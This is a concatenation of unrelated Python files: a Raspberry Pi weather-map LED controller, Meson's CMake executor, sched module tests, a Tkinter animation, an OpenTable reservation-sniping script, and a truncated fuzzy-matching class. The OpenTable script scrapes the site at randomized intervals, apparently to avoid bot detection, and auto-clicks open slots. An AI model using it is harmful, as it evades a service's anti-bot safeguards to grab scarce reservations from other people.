cfg = ConfigParser(converters={'color': colors.get_color})
cfg.read(cfg_files)
if 'megamap' in socket.gethostname():
cfg.set('settings', 'unknown_off', 'False')
cfg.write(open('/etc/rpi_metar.conf', 'w'))
# If we have redefined a color value (e.g. tweaked green a bit), or changed what should be displayed entirely (e.g.
# display ORANGE for LIFR), we need to rebuild the FlightCategory enum.
enum_needs_update = cfg.has_section('colors') or cfg.has_section('flight_categories')
# Load colors first so we can associate those to flight categories / behaviors
if cfg.has_section('colors'):
for color_name in cfg.options('colors'):
color_name = color_name.upper()
color_value = cfg.getcolor('colors', color_name)
# And the hacks begin. Set these newly defined colors in the module.
setattr(colors, color_name.upper(), color_value)
log.debug('Setting custom color: {} -> {}'.format(color_name, color_value))
# Now that colors should all be set, let's associate them to categories / behaviors
categories_to_colors = {
'VFR': colors.GREEN,
'IFR': colors.RED,
'LIFR': colors.MAGENTA,
'MVFR': colors.BLUE,
'UNKNOWN': colors.YELLOW,
'OFF': colors.BLACK,
'MISSING': colors.ORANGE,
'THUNDERSTORM': colors.WHITE,
'WINDY': colors.YELLOW,
}
if cfg.has_section('flight_categories'):
for category_name in cfg.options('flight_categories'):
category_name = category_name.upper()
if category_name not in categories_to_colors:
log.warning('{} is not a valid flight category, ignoring.'.format(category_name))
continue
color_value = cfg.getcolor('flight_categories', category_name)
log.debug('Overriding default color for {}, setting to: {}'.format(category_name, color_value))
categories_to_colors[category_name] = color_value
if enum_needs_update:
wx.FlightCategory = enum.Enum(
'FlightCategory',
categories_to_colors
)
max_wind_speed_kts = cfg.getint('settings', 'max_wind', fallback=MAX_WIND_SPEED_KTS)
unknown_off = cfg.getboolean('settings', 'unknown_off', fallback=True)
for code in cfg.options('airports'):
index = cfg.getint('airports', code)
AIRPORTS[code.upper()] = Airport(code, index, max_wind_speed_kts=max_wind_speed_kts, unknown_off=unknown_off)
return cfg
def on_turn(delta):
"""Let the brightness adjustment thread be aware that it needs to do something."""
log.debug("on turn called.")
ENCODER_QUEUE.put(delta)
ENCODER_EVENT.set()
def adjust_brightness(leds, cfg):
while not ENCODER_QUEUE.empty():
delta = ENCODER_QUEUE.get() * 5
brightness = leds.getBrightness()
try:
leds.setBrightness(brightness + delta)
except OverflowError:
log.info('New brightness exceeds limits: {}'.format(brightness + delta))
else:
leds.show()
log.info('Set brightness to {}'.format(brightness + delta))
# Now that we've handled everything in the queue, write out the current brightness into the
# config file. This way it persists upon reboots / restarts, etc.
if 'settings' not in cfg:
cfg['settings'] = {}
cfg['settings']['brightness'] = str(leds.getBrightness())
with open('/etc/rpi_metar.conf', 'w') as f:
cfg.write(f)
log.info('Saved new brightness ({}) to cfg file.'.format(leds.getBrightness()))
# Indicate that we've handled the event.
ENCODER_EVENT.clear()
def wait_for_knob(event, leds, cfg):
while True:
try:
event.wait()
adjust_brightness(leds, cfg)
except:
log.exception('unexpected error')
def set_legend(leds, cfg):
"""Sets a few LEDs to fixed colors, for use with a legend."""
if not cfg.has_section('legend'):
return
for category in wx.FlightCategory:
index = cfg.getint('legend', category.name.casefold(), fallback=None)
if index is not None:
leds.setPixelColor(index, category.value)
log.info('Legend: set %s to %s.', index, category.name)
def get_num_leds(cfg):
"""Returns the number of LEDs as defined in the configuration file.
It takes into account that LEDs can be defined in both the 'airports' and 'legend' sections.
"""
airport_max = max((airport.index for airport in AIRPORTS.values()))
legend_max = 0
if cfg.has_section('legend'):
legend_max = max((int(v) for v in cfg['legend'].values()))
return max([airport_max, legend_max]) + 1
def main():
# Register the encoder to handle changing the brightness
knob = encoder.RotaryEncoder(callback=on_turn)
def on_exit(sig, frame):
knob.destroy()
set_all(leds, colors.BLACK)
sys.exit(0)
signal.signal(signal.SIGINT, on_exit)
signal.signal(signal.SIGTERM, on_exit)
cron.set_upgrade_schedule()
cfg = load_configuration()
kwargs = {
'num': get_num_leds(cfg),
'pin': 18,
'gamma': colors.GAMMA,
'brightness': int(cfg.get('settings', 'brightness', fallback=128))
}
# Sometimes if we use LED strips from different batches, they behave differently with the gamma
# controls and brightness levels. Therefore we need to be able to disable the gamma controls.
if cfg.get('settings', 'disable_gamma', fallback=False):
kwargs.pop('gamma')
leds = PixelStrip(**kwargs)
leds.begin()
leds.lock = threading.Lock()
set_all(leds, wx.FlightCategory.UNKNOWN.value)
for airport in AIRPORTS.values():
leds.setPixelColor(airport.index, wx.FlightCategory.UNKNOWN.value)
set_legend(leds, cfg)
leds.show()
# Kick off a thread to handle adjusting the brightness
t = threading.Thread(name='brightness', target=wait_for_knob, args=(ENCODER_EVENT, leds, cfg))
t.start()
# A thread to fetch metar information periodically
t = threading.Thread(name='metar_fetcher', target=fetch_metars, args=(METAR_QUEUE, cfg))
t.start()
# A thread to process metar info.
t = threading.Thread(name='metar_processor', target=process_metars, args=(METAR_QUEUE, leds))
t.start()
# A thread to change the LEDs when airport categories change.
t = threading.Thread(name='render_leds', target=render_leds, args=(LED_QUEUE, leds, cfg))
t.start()
# A thread for lightning
if cfg.get('settings', 'lightning', fallback=True):
t = threading.Thread(name='lightning', target=lightning, args=(leds, METAR_EVENT, cfg))
t.start()
# A thread for wind
if cfg.get('settings', 'wind', fallback=True):
t = threading.Thread(name='wind', target=wind, args=(leds, METAR_EVENT, cfg))
t.start()
if __name__ == '__main__':
main()
|
executor.py
|
# Copyright 2019 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This class contains the basic functionality needed to run any interpreter
# or an interpreter-based tool.
import subprocess as S
from pathlib import Path
from threading import Thread
import typing as T
import re
import os
from .. import mlog
from ..mesonlib import PerMachine, Popen_safe, version_compare, MachineChoice, is_windows, OptionKey
from ..programs import find_external_program, NonExistingExternalProgram
if T.TYPE_CHECKING:
from ..environment import Environment
from ..programs import ExternalProgram
TYPE_result = T.Tuple[int, T.Optional[str], T.Optional[str]]
TYPE_cache_key = T.Tuple[str, T.Tuple[str, ...], str, T.FrozenSet[T.Tuple[str, str]]]
class CMakeExecutor:
# The class's copy of the CMake path. Avoids having to search for it
# multiple times in the same Meson invocation.
class_cmakebin = PerMachine(None, None) # type: PerMachine[T.Optional[ExternalProgram]]
class_cmakevers = PerMachine(None, None) # type: PerMachine[T.Optional[str]]
class_cmake_cache = {} # type: T.Dict[T.Any, TYPE_result]
def __init__(self, environment: 'Environment', version: str, for_machine: MachineChoice, silent: bool = False):
self.min_version = version
self.environment = environment
self.for_machine = for_machine
self.cmakebin, self.cmakevers = self.find_cmake_binary(self.environment, silent=silent)
self.always_capture_stderr = True
self.print_cmout = False
self.prefix_paths = [] # type: T.List[str]
self.extra_cmake_args = [] # type: T.List[str]
if self.cmakebin is None:
return
if not version_compare(self.cmakevers, self.min_version):
mlog.warning(
'The version of CMake', mlog.bold(self.cmakebin.get_path()),
'is', mlog.bold(self.cmakevers), 'but version', mlog.bold(self.min_version),
'is required')
self.cmakebin = None
return
self.prefix_paths = self.environment.coredata.options[OptionKey('cmake_prefix_path', machine=self.for_machine)].value
if self.prefix_paths:
self.extra_cmake_args += ['-DCMAKE_PREFIX_PATH={}'.format(';'.join(self.prefix_paths))]
def find_cmake_binary(self, environment: 'Environment', silent: bool = False) -> T.Tuple[T.Optional['ExternalProgram'], T.Optional[str]]:
# Only search for CMake the first time and store the result in the class
# definition
if isinstance(CMakeExecutor.class_cmakebin[self.for_machine], NonExistingExternalProgram):
mlog.debug(f'CMake binary for {self.for_machine} is cached as not found')
return None, None
elif CMakeExecutor.class_cmakebin[self.for_machine] is not None:
mlog.debug(f'CMake binary for {self.for_machine} is cached.')
else:
assert CMakeExecutor.class_cmakebin[self.for_machine] is None
mlog.debug(f'CMake binary for {self.for_machine} is not cached')
for potential_cmakebin in find_external_program(
environment, self.for_machine, 'cmake', 'CMake',
environment.default_cmake, allow_default_for_cross=False):
version_if_ok = self.check_cmake(potential_cmakebin)
if not version_if_ok:
continue
if not silent:
mlog.log('Found CMake:', mlog.bold(potential_cmakebin.get_path()),
f'({version_if_ok})')
CMakeExecutor.class_cmakebin[self.for_machine] = potential_cmakebin
CMakeExecutor.class_cmakevers[self.for_machine] = version_if_ok
break
else:
if not silent:
mlog.log('Found CMake:', mlog.red('NO'))
# Set to False instead of None to signify that we've already
# searched for it and not found it
CMakeExecutor.class_cmakebin[self.for_machine] = NonExistingExternalProgram()
CMakeExecutor.class_cmakevers[self.for_machine] = None
return None, None
return CMakeExecutor.class_cmakebin[self.for_machine], CMakeExecutor.class_cmakevers[self.for_machine]
def check_cmake(self, cmakebin: 'ExternalProgram') -> T.Optional[str]:
if not cmakebin.found():
mlog.log(f'Did not find CMake {cmakebin.name!r}')
return None
try:
p, out = Popen_safe(cmakebin.get_command() + ['--version'])[0:2]
if p.returncode != 0:
mlog.warning('Found CMake {!r} but couldn\'t run it'
''.format(' '.join(cmakebin.get_command())))
return None
except FileNotFoundError:
mlog.warning('We thought we found CMake {!r} but now it\'s not there. How odd!'
''.format(' '.join(cmakebin.get_command())))
return None
except PermissionError:
msg = 'Found CMake {!r} but didn\'t have permissions to run it.'.format(' '.join(cmakebin.get_command()))
if not is_windows():
msg += '\n\nOn Unix-like systems this is often caused by scripts that are not executable.'
mlog.warning(msg)
return None
cmvers = re.search(r'(cmake|cmake3)\s*version\s*([\d.]+)', out).group(2)
return cmvers
def set_exec_mode(self, print_cmout: T.Optional[bool] = None, always_capture_stderr: T.Optional[bool] = None) -> None:
if print_cmout is not None:
self.print_cmout = print_cmout
if always_capture_stderr is not None:
self.always_capture_stderr = always_capture_stderr
def _cache_key(self, args: T.List[str], build_dir: Path, env: T.Optional[T.Dict[str, str]]) -> TYPE_cache_key:
fenv = frozenset(env.items()) if env is not None else frozenset()
targs = tuple(args)
return (self.cmakebin.get_path(), targs, build_dir.as_posix(), fenv)
def _call_cmout_stderr(self, args: T.List[str], build_dir: Path, env: T.Optional[T.Dict[str, str]]) -> TYPE_result:
cmd = self.cmakebin.get_command() + args
proc = S.Popen(cmd, stdout=S.PIPE, stderr=S.PIPE, cwd=str(build_dir), env=env) # TODO [PYTHON_37]: drop Path conversion
# stdout and stderr MUST be read at the same time to avoid pipe
# blocking issues. The easiest way to do this is with a separate
# thread for one of the pipes.
def print_stdout() -> None:
while True:
line = proc.stdout.readline()
if not line:
break
mlog.log(line.decode(errors='ignore').strip('\n'))
proc.stdout.close()
t = Thread(target=print_stdout)
t.start()
try:
# Read stderr line by line and log non trace lines
raw_trace = ''
tline_start_reg = re.compile(r'^\s*(.*\.(cmake|txt))\(([0-9]+)\):\s*(\w+)\(.*$')
inside_multiline_trace = False
while True:
line_raw = proc.stderr.readline()
if not line_raw:
break
line = line_raw.decode(errors='ignore')
if tline_start_reg.match(line):
raw_trace += line
inside_multiline_trace = not line.endswith(' )\n')
elif inside_multiline_trace:
raw_trace += line
else:
mlog.warning(line.strip('\n'))
finally:
proc.stderr.close()
t.join()
proc.wait()
return proc.returncode, None, raw_trace
def _call_cmout(self, args: T.List[str], build_dir: Path, env: T.Optional[T.Dict[str, str]]) -> TYPE_result:
cmd = self.cmakebin.get_command() + args
proc = S.Popen(cmd, stdout=S.PIPE, stderr=S.STDOUT, cwd=str(build_dir), env=env) # TODO [PYTHON_37]: drop Path conversion
while True:
line = proc.stdout.readline()
if not line:
break
mlog.log(line.decode(errors='ignore').strip('\n'))
proc.stdout.close()
proc.wait()
return proc.returncode, None, None
def _call_quiet(self, args: T.List[str], build_dir: Path, env: T.Optional[T.Dict[str, str]]) -> TYPE_result:
build_dir.mkdir(parents=True, exist_ok=True)
cmd = self.cmakebin.get_command() + args
ret = S.run(cmd, env=env, cwd=str(build_dir), close_fds=False,
stdout=S.PIPE, stderr=S.PIPE, universal_newlines=False) # TODO [PYTHON_37]: drop Path conversion
rc = ret.returncode
out = ret.stdout.decode(errors='ignore')
err = ret.stderr.decode(errors='ignore')
return rc, out, err
def _call_impl(self, args: T.List[str], build_dir: Path, env: T.Optional[T.Dict[str, str]]) -> TYPE_result:
mlog.debug(f'Calling CMake ({self.cmakebin.get_command()}) in {build_dir} with:')
for i in args:
mlog.debug(f' - "{i}"')
if not self.print_cmout:
return self._call_quiet(args, build_dir, env)
else:
if self.always_capture_stderr:
return self._call_cmout_stderr(args, build_dir, env)
else:
return self._call_cmout(args, build_dir, env)
def call(self, args: T.List[str], build_dir: Path, env: T.Optional[T.Dict[str, str]] = None, disable_cache: bool = False) -> TYPE_result:
if env is None:
env = os.environ.copy()
args = args + self.extra_cmake_args
if disable_cache:
return self._call_impl(args, build_dir, env)
# First check if cached, if not call the real cmake function
cache = CMakeExecutor.class_cmake_cache
key = self._cache_key(args, build_dir, env)
if key not in cache:
cache[key] = self._call_impl(args, build_dir, env)
return cache[key]
def found(self) -> bool:
return self.cmakebin is not None
def version(self) -> str:
return self.cmakevers
def executable_path(self) -> str:
return self.cmakebin.get_path()
def get_command(self) -> T.List[str]:
return self.cmakebin.get_command()
def get_cmake_prefix_paths(self) -> T.List[str]:
return self.prefix_paths
def machine_choice(self) -> MachineChoice:
return self.for_machine
|
test_sched.py
|
import queue
import sched
import time
import unittest
try:
import threading
except ImportError:
threading = None
TIMEOUT = 10
class Timer:
def __init__(self):
self._cond = threading.Condition()
self._time = 0
self._stop = 0
def time(self):
with self._cond:
return self._time
# increase the time but not beyond the established limit
def sleep(self, t):
assert t >= 0
with self._cond:
t += self._time
while self._stop < t:
self._time = self._stop
self._cond.wait()
self._time = t
# advance time limit for user code
def advance(self, t):
assert t >= 0
with self._cond:
self._stop += t
self._cond.notify_all()
class TestCase(unittest.TestCase):
def test_enter(self):
l = []
fun = lambda x: l.append(x)
scheduler = sched.scheduler(time.time, time.sleep)
for x in [0.5, 0.4, 0.3, 0.2, 0.1]:
z = scheduler.enter(x, 1, fun, (x,))
scheduler.run()
self.assertEqual(l, [0.1, 0.2, 0.3, 0.4, 0.5])
def test_enterabs(self):
l = []
fun = lambda x: l.append(x)
scheduler = sched.scheduler(time.time, time.sleep)
for x in [0.05, 0.04, 0.03, 0.02, 0.01]:
z = scheduler.enterabs(x, 1, fun, (x,))
scheduler.run()
self.assertEqual(l, [0.01, 0.02, 0.03, 0.04, 0.05])
@unittest.skipIfGraalPythonWitoutThreads
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_enter_concurrent(self):
q = queue.Queue()
fun = q.put
timer = Timer()
scheduler = sched.scheduler(timer.time, timer.sleep)
scheduler.enter(1, 1, fun, (1,))
scheduler.enter(3, 1, fun, (3,))
t = threading.Thread(target=scheduler.run)
t.start()
timer.advance(1)
self.assertEqual(q.get(timeout=TIMEOUT), 1)
self.assertTrue(q.empty())
for x in [4, 5, 2]:
z = scheduler.enter(x - 1, 1, fun, (x,))
timer.advance(2)
self.assertEqual(q.get(timeout=TIMEOUT), 2)
self.assertEqual(q.get(timeout=TIMEOUT), 3)
self.assertTrue(q.empty())
timer.advance(1)
self.assertEqual(q.get(timeout=TIMEOUT), 4)
self.assertTrue(q.empty())
timer.advance(1)
self.assertEqual(q.get(timeout=TIMEOUT), 5)
self.assertTrue(q.empty())
timer.advance(1000)
t.join(timeout=TIMEOUT)
self.assertFalse(t.is_alive())
self.assertTrue(q.empty())
self.assertEqual(timer.time(), 5)
def test_priority(self):
l = []
fun = lambda x: l.append(x)
scheduler = sched.scheduler(time.time, time.sleep)
for priority in [1, 2, 3, 4, 5]:
z = scheduler.enterabs(0.01, priority, fun, (priority,))
scheduler.run()
self.assertEqual(l, [1, 2, 3, 4, 5])
def test_cancel(self):
l = []
fun = lambda x: l.append(x)
scheduler = sched.scheduler(time.time, time.sleep)
now = time.time()
event1 = scheduler.enterabs(now + 0.01, 1, fun, (0.01,))
event2 = scheduler.enterabs(now + 0.02, 1, fun, (0.02,))
event3 = scheduler.enterabs(now + 0.03, 1, fun, (0.03,))
event4 = scheduler.enterabs(now + 0.04, 1, fun, (0.04,))
event5 = scheduler.enterabs(now + 0.05, 1, fun, (0.05,))
scheduler.cancel(event1)
scheduler.cancel(event5)
scheduler.run()
self.assertEqual(l, [0.02, 0.03, 0.04])
@unittest.skipIfGraalPythonWitoutThreads
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_cancel_concurrent(self):
q = queue.Queue()
fun = q.put
timer = Timer()
scheduler = sched.scheduler(timer.time, timer.sleep)
now = timer.time()
event1 = scheduler.enterabs(now + 1, 1, fun, (1,))
event2 = scheduler.enterabs(now + 2, 1, fun, (2,))
event4 = scheduler.enterabs(now + 4, 1, fun, (4,))
event5 = scheduler.enterabs(now + 5, 1, fun, (5,))
event3 = scheduler.enterabs(now + 3, 1, fun, (3,))
t = threading.Thread(target=scheduler.run)
t.start()
timer.advance(1)
self.assertEqual(q.get(timeout=TIMEOUT), 1)
self.assertTrue(q.empty())
scheduler.cancel(event2)
scheduler.cancel(event5)
timer.advance(1)
self.assertTrue(q.empty())
timer.advance(1)
self.assertEqual(q.get(timeout=TIMEOUT), 3)
self.assertTrue(q.empty())
timer.advance(1)
self.assertEqual(q.get(timeout=TIMEOUT), 4)
self.assertTrue(q.empty())
timer.advance(1000)
t.join(timeout=TIMEOUT)
self.assertFalse(t.is_alive())
self.assertTrue(q.empty())
self.assertEqual(timer.time(), 4)
def test_empty(self):
l = []
fun = lambda x: l.append(x)
scheduler = sched.scheduler(time.time, time.sleep)
self.assertTrue(scheduler.empty())
for x in [0.05, 0.04, 0.03, 0.02, 0.01]:
z = scheduler.enterabs(x, 1, fun, (x,))
self.assertFalse(scheduler.empty())
scheduler.run()
self.assertTrue(scheduler.empty())
def test_queue(self):
l = []
fun = lambda x: l.append(x)
scheduler = sched.scheduler(time.time, time.sleep)
now = time.time()
e5 = scheduler.enterabs(now + 0.05, 1, fun)
e1 = scheduler.enterabs(now + 0.01, 1, fun)
e2 = scheduler.enterabs(now + 0.02, 1, fun)
e4 = scheduler.enterabs(now + 0.04, 1, fun)
e3 = scheduler.enterabs(now + 0.03, 1, fun)
# queue property is supposed to return an order list of
# upcoming events
self.assertEqual(scheduler.queue, [e1, e2, e3, e4, e5])
def test_args_kwargs(self):
seq = []
def fun(*a, **b):
seq.append((a, b))
now = time.time()
scheduler = sched.scheduler(time.time, time.sleep)
scheduler.enterabs(now, 1, fun)
scheduler.enterabs(now, 1, fun, argument=(1, 2))
scheduler.enterabs(now, 1, fun, argument=('a', 'b'))
scheduler.enterabs(now, 1, fun, argument=(1, 2), kwargs={"foo": 3})
scheduler.run()
self.assertCountEqual(seq, [
((), {}),
((1, 2), {}),
(('a', 'b'), {}),
((1, 2), {'foo': 3})
])
def test_run_non_blocking(self):
l = []
fun = lambda x: l.append(x)
scheduler = sched.scheduler(time.time, time.sleep)
for x in [10, 9, 8, 7, 6]:
scheduler.enter(x, 1, fun, (x,))
scheduler.run(blocking=False)
self.assertEqual(l, [])
if __name__ == "__main__":
unittest.main()
|
Rain_geometry.py
|
from tkinter import *
import random, threading, time, os
# 初始雨滴纵坐标
INIT_HEIGHT = 1
# 雨滴创建
def rainmake(canvas, imagefile):
rainlist = []
for i in range(5):
# 根据图片,创建一排福字
rainlist.append(canvas.create_image(100 + 80 * i, INIT_HEIGHT, anchor=NE, image=imagefile))
return rainlist
# 雨滴下落
def raindown(tk, canvas, imagefile, sec):
# 线程间等待
time.sleep(sec)
rainlist = rainmake(canvas, imagefile)
# 每个福字的纵坐标值
height = [INIT_HEIGHT] * 10
while True:
# 每次移动前稍等一会
time.sleep(0.2)
# 5 个福字一起移动
for i in range(5):
# 如果福字到底了,则不继续移动
if not height[i] == 0:
# 设置下落步调
rnd = random.randint(5, 50)
canvas.move(rainlist[i], 0, rnd)
height[i] = height[i] + rnd
tk.update()
for i,h in enumerate(height):
if h > 400:
# 当福字走到最下方,则删除
canvas.delete(rainlist[i])
tk.update()
# 清空该福的 height
height[i] = 0
print(i,h,height)
# 全到底,则跳出循环
if height == [0] * 5:
print('break:',threading.current_thread().name)
break
def lookloop(tk, canvas, thread):
aliveflg = False
while True:
# 5s 检测一次
time.sleep(5)
for th in thread:
if th.is_alive():
aliveflg = True
else:
aliveflg = False
if aliveflg == False:
break
canvas.create_text(100 , 200, text='雨停了...', fill='red')
canvas.pack()
time.sleep(5)
tk.destroy()
def main():
# 创建窗口对象
tk = Tk()
tk.title('送福雨')
canvas_style = {
'bg':'white',
'height':'500',
'width':'410',
'cursor':'circle'
}
# 创建画布
canvas = Canvas(tk,canvas_style)
canvas.pack()
# 图片素材
if not os.path.exists('pic.gif'):
raise Exception('pic.gif file does not exists.')
imagefile = PhotoImage(file = 'pic.gif')
thread = []
for i in range(100):
thread.append(threading.Thread(target=raindown, args=(tk, canvas, imagefile, i)))
for t in thread:
t.start()
# 新开一个线程监控运行中的线程
threading.Thread(target=lookloop, args=(tk, canvas, thread)).start()
# 进入消息循环
tk.mainloop()
|
snippet.py
|
#! /usr/bin/env python
"""
Pounce on an open OpenTable reservation.
"""
import sys, os, time, re, mechanize, gtk, webkit, threading, random
rid = 1180 # OpenTable restaurant ID; 1180 = French Laundry
people_choices = [3, 3, 3, 4] # number of people to request for; cycles through choices
targetdate = parsedate ((5, 13, 2012, 7, 30, 00, 'PM'))
slop = 86400 # in seconds; = 1 day; default date tolerance
mintime = targetdate - slop # override manually if you want
maxtime = targetdate + slop
noisemaker_command = 'paplay /usr/share/sounds/gnome/default/alerts/bark.ogg'
noisemaker_interval = 3 # in seconds
timeout = 5 # in seconds; timeout for web request
# I don't know what (if any) robot prevention systems OpenTable uses ...
minperiod = 3 # shortest interval between requests
maxperiod = 9 # longest interval between requests
assert mintime < targetdate
assert maxtime > targetdate
def makequery (rid, date, people):
query_url = 'http://opentable.com/opentables.aspx?t=rest&r=%d&d=%s&p=%d'
return query_url % (rid, fmtdate (date), people)
def fmtdate (t):
q = time.localtime (t)
yr, mo, dy = q[:3]
hr, mn, sc = q[3:6]
if hr == 0:
hr = 12
sfx = 'AM'
elif hr < 12:
sfx = 'AM'
else:
hr -= 12
sfx = 'PM'
return '%d/%d/%d%%20%d:%02d:%02d%%20%s' % (mo, dy, yr, hr, mn, sc, sfx)
def parsedate (t):
mo, dy, yr, hr, mn, sc = [int (x) for x in t[:6]]
if t[6] == 'AM':
if hr == 12:
hr = 0
elif t[6] == 'PM':
if hr != 12:
hr += 12
return time.mktime ((yr, mo, dy, hr, mn, sc, 0, 0, -1))
def findhits (n, f, targetdate):
datepattern = re.compile (r'\[\'(\d{1,2})\/(\d{1,2})\/(\d{4}) '
r'(\d{1,2})\:(\d{2})\:(\d{2}) ([AP]M)')
pounces = []
for l in f:
dmatches = re.findall (datepattern, l)
if not len (dmatches):
continue
for dt in dmatches:
date = parsedate (dt)
if date < mintime or date > maxtime:
print n, time.strftime ('%Y/%m/%d %H:%M:%S'), '**rejecting**', fmtdate (date)
continue
score = abs (date - targetdate)
pmatch = '[\'%s/%s/%s %s:%s:%s %s\'' % dt
pounces.append ((score, date, pmatch))
pounces.sort (key=lambda t: t[0])
return pounces
def noisemaker ():
while True:
os.system (noisemaker_command)
time.sleep (noisemaker_interval)
def pounce (qurl, pmatch):
thr = threading.Thread (target=noisemaker)
thr.start ()
v = webkit.WebView ()
w = gtk.Window ()
w.connect ('destroy', lambda q: w.destroy)
w.set_size_request (1000, 600)
w.connect ('delete-event', lambda w, e: gtk.main_quit ())
s = gtk.ScrolledWindow ()
s.add (v)
w.add (s)
w.show_all ()
myscript = r'''
var lis = document.getElementsByTagName("li");
for (var i = 0; i < lis.length; i++) {
var a = lis[i].getAttribute ("a");
if (a != null) {
if (a.indexOf ("%s") == 0) {
Time_OnClick (lis[i], GridType.ResultsGrid);
break;
}
}
}
''' % pmatch
def finished (*args):
if v.get_load_status () != webkit.LOAD_FINISHED:
return
v.execute_script (myscript)
v.connect ('notify::load-status', finished)
v.open (qurl)
gtk.main ()
def iteration (n, targetdate):
br = mechanize.Browser ()
people = people_choices[n % len (people_choices)]
qurl = makequery (rid, targetdate, people)
print n, time.strftime ('%Y/%m/%d %H:%M:%S'), 'R:', qurl
try:
br.open (qurl, timeout=timeout)
except mechanize.URLError:
print n, time.strftime ('%Y/%m/%d %H:%M:%S'), '--> timeout'
return
pounces = findhits (n, br.response (), targetdate)
if not len (pounces):
print n, time.strftime ('%Y/%m/%d %H:%M:%S'), '--> no results'
return
score, date, pmatch = pounces[0]
print n, time.strftime ('%Y/%m/%d %H:%M:%S'), 'GOT ONE:', date, pmatch, score
pounce (qurl, pmatch)
n = 0
while True:
try:
iteration (n, targetdate)
except Exception as e:
print >>sys.stderr, n, 'EXCEPTION:', e
time.sleep (random.uniform (minperiod, maxperiod))
n += 1
|
extract_fuzzy_matches.py
|
"""Given source and target TM files, extract fuzzy matches for a new input file by using a
variety of methods. You can use formal matching methods such as edit distance and set
similarity, as well as semantic fuzzy matching with sent2vec and Sentence Transformers."""
import logging
import multiprocessing
import time
from multiprocessing.context import Process
from operator import itemgetter
from pathlib import Path
from typing import List, Optional, Tuple
import editdistance
import SetSimilaritySearch
from nfr.fuzzy_matching.faiss_retriever import FaissRetriever
from tqdm import tqdm
logger = logging.getLogger("nfr")
class FuzzyMatcher:
def __init__(
self,
method: str,
maxmatch: int,
minscore: float,
n_setsim_candidates: int,
setsim_function: str,
threads: int,
model_name_or_path: Optional[str] = None,
faiss: Optional[str] = None,
use_cuda: bool = False,
query_multiplier: int = 2,
):
if method not in ["setsim", "setsimeditdist", "editdist", "sent2vec", "stransformers"]:
raise ValueError(
"Method should be one of the following: 'setsim', 'setsimeditdist', 'editdist', "
"'sent2vec', 'stransformers'"
)
if method in ["sent2vec", "stransformers"] and not (model_name_or_path and faiss):
raise ValueError(
"When using method 'sent2vec' or 'stransformers', the 'model_name_or_path' and 'faiss'"
" parameters must be provided"
)
self.match_count = 0
self.nomatch_count = 0
self.method = method
self.insrc_lines = []
self.tmsrc_lines = []
self.tmtgt_lines = []
self.maxmatch = maxmatch
self.minscore = minscore
self.n_setsim_candidates = n_setsim_candidates
self.setsim_function = setsim_function
self.n_threads = threads
self.index = None
self.model_name_or_path = model_name_or_path
self.faiss_f = faiss
self.faiss_retriever = None
self.use_cuda = use_cuda
self.query_multiplier = query_multiplier
self.results_q = None
if self.use_cuda and self.n_threads > 1:
raise ValueError(
"Cannot use 'use_cuda' alongside multithreading ('n_threads' > 1). Either use 'use_cuda',"
" or 'n_threads' but not at the same."
)
def _get_unique_chunks(self, input_lines) -> List:
"""Split a list of unique items into N equal parts
:param input_lines: list of unique items
:return: list of lists (of size "n_threads")
"""
unique_lines = list(set(input_lines))
length = len(unique_lines)
logger.info("No. unique segments in 'insrc' = " + str(length))
return [
unique_lines[i * length // self.n_threads : (i + 1) * length // self.n_threads]
for i in range(self.n_threads)
]
def _init_setsim_index(self, tmsrc_lines):
"""
Initialize SetSimilarity Search index
"""
if self.method in ["setsimeditdist", "setsim"]:
# Initialize setsim search index using TM source
segset = []
for line in tmsrc_lines:
tokens = line.strip().split()
segset.append(tokens)
index = SetSimilaritySearch.SearchIndex(
segset, similarity_func_name=self.setsim_function, similarity_threshold=self.minscore
)
self.index = index
@staticmethod
def _tuple2string(tup: Tuple) -> str:
"""
Convert a tuple of tokens to string
:param tup: an existing tuple
:return: string
"""
new_tup = tuple(
str(x).replace("\t", " ") for x in tup
) # replace all tabs with spaces before using the tab as delimiter
new_tup_str = "\t".join(new_tup)
return new_tup_str
@staticmethod
def _readlines(fin):
with open(fin, encoding="utf-8") as fhin:
lines = fhin.readlines()
return lines
@staticmethod
def _remove_duplicate_matches(matches):
# format of matches_list: (source, id, candidate, tmtgt_lines[id].strip(), final_score)
seen_translations = set()
matches_unique_translations = list()
for item in matches:
# Translation is stored at item with index -2
translation = item[-2]
if translation in seen_translations:
continue
else:
matches_unique_translations.append(item)
seen_translations.add(translation)
return matches_unique_translations
@staticmethod
def _get_editdistance(source: str, candidate: str) -> float:
"""
Get editdistance score between two lists of word tokens
:param source: list of tokens for the input sentence
:param candidate: list of tokens for the candidate sentence
:return: return editdistance score (normalized on sentence length)
"""
candidate = candidate.split()
source = source.split()
ed = editdistance.eval(source, candidate)
maxlength = max(len(source), len(candidate))
ed_norm = (maxlength - ed) / maxlength
return ed_norm
def _init_data(self, insrc, tmsrc, tmtgt):
"""Initialize instance attributes based on the input that `process` received"""
self.tmsrc_lines = self._readlines(tmsrc)
self.tmtgt_lines = self._readlines(tmtgt)
if len(self.tmsrc_lines) != len(self.tmtgt_lines):
raise ValueError("No. lines in tmsrc and tmtgt are not equal.")
self.insrc_lines = self._readlines(insrc)
def _init_index(self):
if self.method in ["sent2vec", "stransformers"] and self.faiss_retriever is None:
self.faiss_retriever = FaissRetriever(
self.tmsrc_lines, self.tmtgt_lines, self.model_name_or_path, self.faiss_f, self.method, self.use_cuda
)
elif self.index is None:
self._init_setsim_index(self.tmsrc_lines)
def process(self, insrc, tmsrc, tmtgt):
start_time = time.time()
self._init_data(insrc, tmsrc, tmtgt)
self._init_index()
fout = f"{insrc}.matches.mins{self.minscore}.maxm{self.maxmatch}"
fout += (
f".{self.method}"
if self.method in ["sent2vec", "stransformers"]
else f".{self.setsim_function}{self.n_setsim_candidates}"
)
fout += ".txt"
with multiprocessing.Manager() as manager:
# Start queue where we'll `put` the results so that the writer can `get` them
self.results_q = manager.Queue()
# Separate writer process for efficiency reasons
# (Might not matter _that_ much depending on your chosen batch size)
writer_proc = Process(target=self._writer, args=(fout,))
writer_proc.start()
# If we only use 0/1 thread, just run in the main thread. This will ensure that we do not run into issues
# with FAISS on GPU when using use_cuda
if self.n_threads < 2:
